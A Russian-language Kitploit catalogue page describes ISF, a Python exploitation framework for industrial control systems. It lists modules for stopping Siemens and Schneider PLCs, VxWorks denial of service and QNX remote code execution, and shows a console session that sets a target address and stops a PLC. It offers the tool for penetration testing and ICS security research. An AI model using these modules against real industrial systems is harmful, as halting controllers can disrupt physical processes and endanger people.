Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
isf — ISF(Industrial Control System Exploitation Framework) — фреймворк для эксплуатации, основанный на Python. | Kitploit
Инструменты/GitHubGitHub/dark-lbp/isf
Фреймворки для пентестаФреймворки для эксплойтовКартирование сетиАнализ уязвимостейЭксплуатацияБезопасность SCADA/ICSСбор информацииФаззингРазработка Полезной НагрузкиArchived
GitHubdark-lbp/isf

isf

1.1k3012 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ISF(Industrial Control System Exploitation Framework) — фреймворк для эксплуатации, основанный на Python.

Репозиторий

Industrial Exploitation Framework

ISF (Industrial Exploitation Framework) — это фреймворк для эксплуатации, основанный на Python, похожий на metasploit framework.

ISF основан на проекте с открытым исходным кодом routersploit.

Читать на других языках: English, 简体中文,

Disclaimer

Использование ISF для атак на цели без предварительного взаимного согласия незаконно. Пользователь несет ответственность за соблюдение всех применимых местных, государственных и федеральных законов. Разработчики не несут никакой ответственности и не отвечают за любое неправомерное использование или ущерб, причиненный этой программой.

ICS Protocol Clients

НазваниеПутьОписание
modbus_tcp_clienticssploit/clients/modbus_tcp_client.pyКлиент Modbus-TCP
wdb2_clienticssploit/clients/wdb2_client.pyКлиент WdbRPC версии 2 (Vxworks 6.x)
s7_clienticssploit/clients/s7_client.pyКлиент s7comm (ПЛК S7 300/400)

Exploit Module

Scanner Module

ICS Protocols Module (Scapy Module)

Эти протоколы могут использоваться в других фреймворках для фаззинга, таких как Kitty, или для создания собственного клиента.

Install

Python requirements

  • gnureadline (только OSX)
  • requests
  • paramiko
  • beautifulsoup4
  • pysnmp
  • python-nmap
  • scapy Мы рекомендуем установить scapy вручную, следуя этой официальной документации

Установка на Kali

root@kitploit:~
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

Usage

root@kitploit:~
    root@kali:~/Desktop/temp/isf# python isf.py
    
      _____ _____  _____ _____ _____  _      ____ _____ _______
     |_   _/ ____|/ ____/ ____|  __ \| |    / __ \_   _|__   __|
       | || |    | (___| (___ | |__) | |   | |  | || |    | |
       | || |     \___ \\___ \|  ___/| |   | |  | || |    | |
      _| || |____ ____) |___) | |    | |___| |__| || |_   | |
     |_____\_____|_____/_____/|_|    |______\____/_____|  |_|
    
    
                    ICS Exploitation Framework
    
    Примечание: ICSSPOLIT — это форк routersploit (https://github.com/reverse-shell/routersploit)
    Команда разработчиков: wenzhe zhu (dark-lbp)
    Версия: 0.1.0
    
    Эксплойты: 2 Сканеры: 0 Учётные данные: 13
    
    Эксплойты ICS: ПЛК: 2 Коммутаторы ICS: 0 ПО: 0
    
    isf >

Exploits

root@kitploit:~
isf > use exploits/plcs/
exploits/plcs/siemens/  exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >

Вы можете использовать клавишу Tab для автодополнения.

Options

Отображение параметров модуля:

root@kitploit:~
isf (S7-300/400 PLC Control) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. 192.168.1.1
   port       102                  Target Port


Module options:

   Name        Current settings     Description
   ----        ----------------     -----------
   slot        2                    CPU slot number.
   command     1                    Command 0:start plc, 1:stop plc.


isf (S7-300/400 PLC Control) >

Установка параметров

root@kitploit:~
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}

Run module

root@kitploit:~
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >

Отображение информации об эксплойте

root@kitploit:~
isf (S7-300/400 PLC Control) > show info

Name:
S7-300/400 PLC Control

Description:
Use S7comm command to start/stop plc.

Devices:
-  Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

Authors:
-  wenzhe zhu <jtrkid[at]gmail.com>

References:

isf (S7-300/400 PLC Control) >

Documents

  • Использование клиента Modbus-TCP
  • Использование клиента WDBRPCV2
  • Использование клиента S7comm
  • Использование SNMP_bruteforce
  • Использование подбора пароля ПЛК S7 300/400
  • Использование сканера Vxworks 6.x
  • Использование сканера Profinet DCP
  • Использование сканера S7comm
  • Использование модуля установки IP Profinet DCP
  • Загрузка модулей из дополнительной папки
  • Как написать собственный модуль
Скачать инструмент
НазваниеПутьОписание
s7_300_400_plc_controlexploits/plcs/siemens/s7_300_400_plc_control.pyЗапуск/остановка ПЛК S7-300/400
s7_1200_plc_controlexploits/plcs/siemens/s7_1200_plc_control.pyЗапуск/остановка/сброс ПЛК S7-1200
vxworks_rpc_dosexploits/plcs/vxworks/vxworks_rpc_dos.pyУдалённая атака типа «отказ в обслуживании» Vxworks RPC (CVE-2015-7599)
quantum_140_plc_controlexploits/plcs/schneider/quantum_140_plc_control.pyЗапуск/остановка ПЛК серии Schneider Quantum 140
crash_qnx_inetd_tcp_serviceexploits/plcs/qnx/crash_qnx_inetd_tcp_service.pyАтака типа «отказ в обслуживании» QNX Inetd TCP
qconn_remote_execexploits/plcs/qnx/qconn_remote_exec.pyУдалённое выполнение кода QNX qconn
profinet_set_ipexploits/plcs/siemens/profinet_set_ip.pyНастройка IP устройства Profinet DCP
НазваниеПутьОписание
profinet_dcp_scanscanners/profinet_dcp_scan.pyСканер Profinet DCP
vxworks_6_scanscanners/vxworks_6_scan.pyСканер Vxworks 6.x
s7comm_scanscanners/s7comm_scan.pyСканер S7comm
enip_scanscanners/enip_scan.pyСканер EthernetIP
НазваниеПутьОписание
pn_dcpicssploit/protocols/pn_dcpПротокол Profinet DCP
modbus_tcpicssploit/protocols/modbus_tcpПротокол Modbus TCP
wdbrpc2icssploit/protocols/wdbrpc2Протокол WDB RPC версии 2
s7commicssploit/protocols/s7comm.pyПротокол S7comm